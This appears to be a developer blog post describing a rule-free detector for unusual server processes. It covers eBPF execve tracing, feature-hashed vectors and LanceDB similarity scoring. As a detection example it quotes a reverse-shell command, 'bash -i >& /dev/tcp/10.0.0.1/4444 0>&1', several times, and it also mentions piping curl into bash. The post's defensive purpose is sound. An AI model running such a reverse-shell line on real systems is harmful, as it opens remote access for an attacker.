Tools: Latest: Detecting unusual processes on your servers without writing a single rule

Tools: Latest: Detecting unusual processes on your servers without writing a single rule

[tracepoint] Most security tooling works by asking you to define what "bad" looks like upfront. Falco gives you YAML rules. OSSEC has signatures. Wazuh has a 5,000-line ruleset that ships with the product and still misses half of what matters in your specific environment. The problem isn't that rules are bad — it's that they can only catch what someone already thought to write a rule for. A novel attack, an unusual deployment pattern, or a rogue process your team introduced six months ago and forgot about will all sail straight through. We wanted something different: a system that learns what "normal" looks like on each server and workload automatically, and flags anything that deviates — without any configuration. Here's how we built it using eBPF and LanceDB. Step 1: Capture everything at the kernel level with eBPF

eBPF lets you attach programs to kernel events with minimal overhead. We attach to the sys_enter_execve tracepoint, which fires every time any process is executed on the machine — before the process even starts running. For each execution we capture: The process name (comm) and full command line (argv)The parent process nameThe UID of the calling processAny active network connections (src/dst IP, port)This is written in Rust using the Aya framework, which compiles the eBPF kernel program separately and loads it at runtime: pub fn gretl_execve(ctx: TracePointContext) -> u32 { let filename_ptr = unsafe { ctx.read_at::(16)? } as *const u8; let pidtgid = bpf_get_current_pid_tgid(); let pid = (pidtgid >> 32) as u32; }The events are written to a ring buffer and consumed by the userspace agent, which batches them and POSTs to the backend every 60 seconds. On kernel ≥ 5.8 with BTF enabled, zero instrumentation is required — no agents inside your containers, no sidecars, no changes to your application code. For servers without eBPF support, the Node.js agent falls back to reading /proc//cmdline and /proc//status directly, tracking new PIDs each interval. You lose the real-time kernel hook but still get the process telemetry. Step 2: Represent each process execution as a vectorThe raw event — a process name, a cmdline string, a parent process, a port — isn't directly comparable. To measure similarity between executions, we need to turn each event into a fixed-length vector. We use feature hashing: tokenise the event fields, hash each token into a position in a 128-dimensional vector, and accumulate signed contributions. The result is normalised to a unit vector. function featureVector(event: ProcessEvent): number[] { const vec = new Float32Array(128); const tokens = [ event.process_name, event.parent_process, event.event_type, String(event.local_port), String(event.remote_port), ...tokenise(event.cmdline), // split cmdline into meaningful tokens ]; for (let i = 0; i < tokens.length; i++) { const t = tokens[i].toLowerCase().trim(); if (!t) continue; const idx = hashStr(t, i * 31) % 128; const sign = (hashStr(t, i * 31 + 1) & 1) ? 1 : -1; vec[idx] += sign; } // L2 normalise so cosine distance is well-defined let norm = 0; for (let i = 0; i < 128; i++) norm += vec[i] * vec[i]; norm = Math.sqrt(norm) || 1; return Array.from(vec).map(v => v / norm);}Feature hashing is deterministic, requires no external model, adds no latency, and works well for this kind of structured-text input. A bash -i >& /dev/tcp/... command and a normal bash --login invocation will land in very different regions of the vector space. Why not use a neural embedding model?We looked at this seriously. Models like all-MiniLM-L6-v2 (22 MB, 384 dims) or OpenAI's text-embedding-3-small would give richer semantic similarity — they know that sh and bash are both shells, that /tmp and /dev/shm are both writable scratch paths. The problem is the operational cost at ingestion time. The agent reports process events roughly every 60 seconds per server. For a fleet of 50 servers that's ~3,000 events per hour, each needing an embedding call before it can be scored and stored. The options were: Local model on the backend — works, but adds a cold-start dependency, ~200 MB of model weights on disk, and 5–20 ms of CPU per event. On a small Fly.io instance shared with the API server, that's noticeable.External API (e.g. OpenAI) — adds network latency to every ingest request, a per-token cost that scales with fleet size, and a hard external dependency that can take your security pipeline down.Feature hashing — runs in <0.1 ms, zero dependencies, no network calls, fully deterministic. The same input always produces the same vector, which also makes testing straightforward.For this specific input — structured fields like process names, parent pids, cmdline tokens — feature hashing performs surprisingly well. bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 and bash --login land in very different regions of the vector space because their token sets barely overlap. That's all we need for anomaly scoring. The embedding layer is intentionally isolated behind a single featureVector() function. Swapping it for a neural model later is a one-function change — the scoring logic, the LanceDB tables, and the API surface don't care what's inside it. Step 3: Store and query with LanceDBLanceDB is an embedded vector database — it runs inside your process, stores data on disk, and supports fast approximate nearest-neighbour search with no separate infrastructure required. We create one LanceDB table per (org_id, workload) pair. Each row stores the 128-dim vector and a timestamp. The table grows as new events arrive and old entries are pruned after 7 days. export async function scoreAndLearn( org_id: string, workload: string, event: ProcessEvent,): Promise { const conn = await db(); const table = await getOrCreateTable(conn, tableName(org_id, workload)); const vec = featureVector(event); // Find k=10 nearest neighbours in this workload's history const results = await table.vectorSearch(vec).limit(10).toArray(); let score = 1.0; // default: completely unseen if (results.length > 0) { const distances = results.map(r => cosineDistance(vec, Array.from(r.vector)) ); const minDist = Math.min(...distances); score = Math.min(1, minDist * 2); // scale to 0–1 } // Add this event to the baseline for future comparisons table.add([{ vector: vec, ts: Date.now() }]); return score;}The anomaly score is 0 for something we've seen many times before, and 1 for something completely new. It gets stored alongside the event in ClickHouse so you can query, filter, and alert on it. Step 4: Natural language searchOnce every event is a vector, querying by description becomes trivial. We embed the search query using the same feature-hashing pipeline and run a nearest-neighbour search across all workload tables. // In the dashboard Security tab:// "show me anything that looks like a reverse shell" POST /telemetry/security/search{ "query": "reverse shell bash outbound connection" }This returns the events whose vectors are closest to the query vector — semantically similar behaviour, not keyword matches. A process running bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 will score highly even if it doesn't contain the literal words "reverse shell". What it looks like in practiceAfter running on a production server for a few days, the baseline learns what "normal" looks like: your web server process, your cron jobs, your deployment scripts. Then: A developer accidentally leaves a debug shell running → anomaly score 0.85, flagged as warnYour CI/CD pipeline runs a new build script for the first time → score 0.72 on first run, drops to 0.1 after the second runSomeone runs curl | bash as root → score 0.94, flagged immediatelyYour usual nginx worker restarts → score 0.02, ignoredNo rules were written for any of these. The system learned the baseline automatically and the deviations surfaced on their own. The architecture in one diagramServer Backend Storage────── ─────── ─────── eBPF (kernel) ──execve──▶ /otlp/v1/events │/proc fallback ──────────▶ │ ▼ featureVector() │ ▼ LanceDB (per workload) ──▶ anomaly_score │ ▼ ClickHouse.security_events │ ▼ Dashboard + NL searchWhat's nextThe current embedding is purely structural — it knows that bash and sh are different tokens, but doesn't know they're semantically similar shells. Upgrading to a small neural embedding model (something like all-MiniLM-L6-v2) would improve natural language search quality significantly, especially for queries phrased in plain English rather than technical terms. We're also working on per-workload alert thresholds — so a security-sensitive production workload can be configured to alert at score 0.6, while a noisy dev environment uses a higher threshold of 0.85. Try it on your servers

The agent installs in one command and starts building a baseline immediately. Works on any Linux server — EC2, GCP, bare metal. eBPF on kernel ≥ 5.8, /proc fallback everywhere else. GR_TOKEN=your-token bash <(curl -fsSL https://gretl.dev/install-agent.sh) Templates let you quickly answer FAQs or store snippets for re-use. Hide child comments as well For further actions, you may consider blocking this person and/or reporting abuse

Code Block

Copy

let mut event = ExecveEvent { pid, comm: [0u8; 16], filename: [0u8; 64], argv1: [0u8; 64], // ... }; if let Ok(comm) = bpf_get_current_comm() { event.comm = comm; } emit_execve(&event) let mut event = ExecveEvent { pid, comm: [0u8; 16], filename: [0u8; 64], argv1: [0u8; 64], // ... }; if let Ok(comm) = bpf_get_current_comm() { event.comm = comm; } emit_execve(&event) let mut event = ExecveEvent { pid, comm: [0u8; 16], filename: [0u8; 64], argv1: [0u8; 64], // ... }; if let Ok(comm) = bpf_get_current_comm() { event.comm = comm; } emit_execve(&event)